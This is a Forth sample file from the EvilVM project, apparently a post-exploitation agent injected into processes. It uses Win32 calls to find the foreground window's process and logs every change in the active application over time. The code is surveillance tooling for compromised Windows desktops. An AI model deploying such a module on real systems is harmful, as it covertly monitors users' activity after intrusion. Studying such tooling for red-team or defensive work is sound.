/samples/foreground.fth
https://github.com/jephthai/EvilVM · Forth · 94 lines · 68 code · 26 blank · 0 comment · 11 complexity · 31ea2ba3b3879f735130e780f59a63e7 MD5 · raw file
- \ require exceptions.fth
- \
- \ This sample implements some functionality for obtaining and monitoring
- \ the the foreground application for the windows desktop. This code
- \ must be run from a process with access to a desktop session, so take
- \ care where EvilVM is injected.
- \
- \
- { ."
- foreground.fth
-
- Observe the foreground window, and provide facility to monitor
- the foreground activity of the current desktop session.
-
- Run foreground to see the current foreground application.
- Run monitor-fg to log changes in foreground over time.
- Use @foreground to get a pointer to a cstring with the current name.
- " ETX emit }!
- private
- \ We need functions from these two DLLs
- loadlib user32.dll
- value user32
- loadlib psapi.dll
- value psapi
- \ Import functions from Win32 DLLs
- user32 0 dllfun GetForegroundWindow GetForegroundWindow
- user32 2 dllfun GetWindowThreadProcessId GetWindowThreadProcessId
- kernel32 3 dllfun OpenProcess OpenProcess
- psapi 4 dllfun GetModuleFileNameExA GetModuleFileNameExA
- 0 value window \ a handle to a window
- 0 value proc \ a handle to open a process to get its module name
- \ Allocate some local memory
- variable pid
- create filename 1024 allot \ store a module path
- create previous 1024 allot \ keep two around, so we can spot changes
- \ The Win32 part of what we do; always looks ugly. I'm writing this in
- \ an exception handling style to avoid ugly conditionals.
- : foreground
- try
- \ get a handle to the current foreground window
- '{ GetForegroundWindow [to] window }' '{ window CloseHandle drop }'
- attempt window +assert
- \ get the PID that owns that window
- window pid GetWindowThreadProcessId +assert
- \ open a handle to that process
- '{ $1000 0 pid @ OpenProcess [to] proc }' '{ proc CloseHandle drop }'
- attempt proc +assert
- \ fill the 'filename' buffer with the process image name
- proc 0 filename 1024 GetModuleFileNameExA +assert
- ensure
- cleanup
- done
- ;
- \ Now for the Forth-ish UI layer for providing useful foreground application
- \ words for the EvilVM environment.
- : backup-name filename previous 1024 move ;
- : different? filename previous cstrcmp ;
- : .filename @time .time pid @ . filename .cstring cr ;
- : .maybe? different? if backup-name .filename then ;
- : quit? key? if key [char] q = else 0 then ;
- : monitor-fg quit? if .post else foreground .maybe? 5000 ms tail then ;
- : .header ." Monitoring foreground applications\n"
- ." enter 'q' to terminate loop\n" ;
- public{
- \ Public interface -- distill everything to two commands that should
- \ be handy for the user.
- : @foreground foreground filename ;
- : foreground foreground .pre .filename .post ;
- : monitor-fg .pre .header monitor-fg ;
- }public